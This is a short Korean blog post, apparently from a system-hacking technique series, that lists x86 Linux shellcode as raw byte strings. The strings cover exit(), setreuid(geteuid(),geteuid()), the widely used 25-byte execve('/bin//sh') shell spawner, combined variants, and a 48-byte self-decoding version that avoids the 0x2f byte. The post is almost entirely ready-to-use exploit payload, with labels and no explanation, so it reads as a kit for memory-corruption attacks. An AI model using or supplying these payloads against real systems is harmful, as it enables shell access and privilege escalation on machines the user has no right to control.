ii4gsp
쉘코드 모음 본문
6byte 쉘코드 exit() 포함
\x31\xc0\xb0\x01\xcd\x80
16byte 쉘코드 setreuid(geteuid(),geteuid()) 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80
25byte 쉘코드 (제일 많이 쓰임)
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
31byte 쉘코드 exit() 포함
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
41byte 쉘코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
47byte 쉘코드 setreuid(geteuid(),geteuid()), exit() 포함
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
48byte 쉘코드 x2f없는 코드
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
'시스템 해킹 > Technique' 카테고리의 다른 글
SEH Overwrite 기법 (0) | 2020.01.15 |
---|---|
구조적 예외 처리 SEH (Structured Exception Handler) (0) | 2020.01.15 |
윈도우 실행 파일 구조 (0) | 2020.01.13 |
[2] 버퍼 오버플로우 (Buffer Overflow) 개념 (0) | 2019.11.16 |
[1] 버퍼 오버플로우 (Buffer Overflow) 개념 (0) | 2019.11.16 |
Comments